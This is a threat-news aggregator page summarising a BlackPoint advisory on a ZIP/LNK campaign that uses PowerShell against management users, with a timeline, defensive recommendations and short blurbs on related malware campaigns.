Find notable cyber news and cases, enriched with sources, timelines, and signals.
Home Browse News Feed Stats Watchlists Beta About Contact

Credential-themed ZIP/LNK PowerShell delivery campaign targeting management users

Campaign
First reported
Last updated
Happening score
H score 37
1 unique sources, 1 articles

Summary

Hide ▲

A credential-themed ZIP/LNK delivery campaign is using obfuscated PowerShell to fetch DLL payloads, creating a stealthy foothold risk for management users. The lures promise passport scans and payment records to encourage clicks. The chain then executes the payload through rundll32.exe and shifts files when it detects antivirus processes.

Related Happenings

Formbook phishing campaign using DLL sideloading and obfuscated JavaScript

Campaign
First: 20.04.2026 18:01 Last: 20.04.2026 18:01 Sources 1

About this happening: The **Formbook** phishing operation is targeting **Windows** organizations across **Greece, Spain, Slovenia, Bosnia, Croatia** and **South America**, using **DLL sideloading** and...

Open Happening

InstallFix Claude Code malvertising campaign

Campaign
First: 06.03.2026 17:00 Last: 06.03.2026 17:00 Sources 1

About this happening: **InstallFix** is being used in an active **malvertising** operation that pushes cloned **Claude Code** install pages and malicious CLI instructions, putting users who search for...

Open Happening

OAuth-phished ZIP/LNK/PowerShell malware delivery chain

Malware Activity
First: 03.03.2026 11:20 Last: 03.03.2026 11:20 Sources 1

About this happening: **ZIP-delivered malware** now uses a **PowerShell** and **DLL side-loading** chain to infect Windows devices and reach an external **C2 server**, increasing the risk of follow-on...

Open Happening

CRESCENTHARVEST Windows RAT and info-stealer activity

Malware Activity
First: 19.02.2026 10:13 Last: 19.02.2026 10:13 Sources 1

About this happening: The **CRESCENTHARVEST** malware activity centers on **version.dll**, a **Windows RAT and information stealer** that can execute commands, log keystrokes, and exfiltrate data. It m...

Open Happening

ClickFix DNS-based nslookup staging campaign

Campaign
First: 15.02.2026 16:10 Last: 15.02.2026 16:10 Sources 1

About this happening: The **ClickFix** campaign has added **DNS-based staging** that uses **nslookup** in the **Windows Run dialog** to fetch and run a second-stage payload, making malicious execution...

Open Happening

Timeline

  1. 01.10.2025 18:00 2 articles · 7mo ago

    BlackPoint advisory on credential-themed ZIP/LNK PowerShell delivery campaign

    Initial Disclosure

    BlackPoint describes a campaign using credential-themed ZIP archives with malicious .lnk files that quietly launch obfuscated PowerShell, download DLL payloads disguised as .ppt files, and execute them with rundll32.exe while targeting management vertical users. The advisory notes that the dropper checks for common antivirus processes, switches payload files for stealth, and recommends blocking or detonating LNK files in archives, enforcing Mark of the Web, restricting rundll32 usage, and instrumenting PowerShell with script block logging, transcription, AMSI, and TLS inspection.

    Show sources
    Open in new tab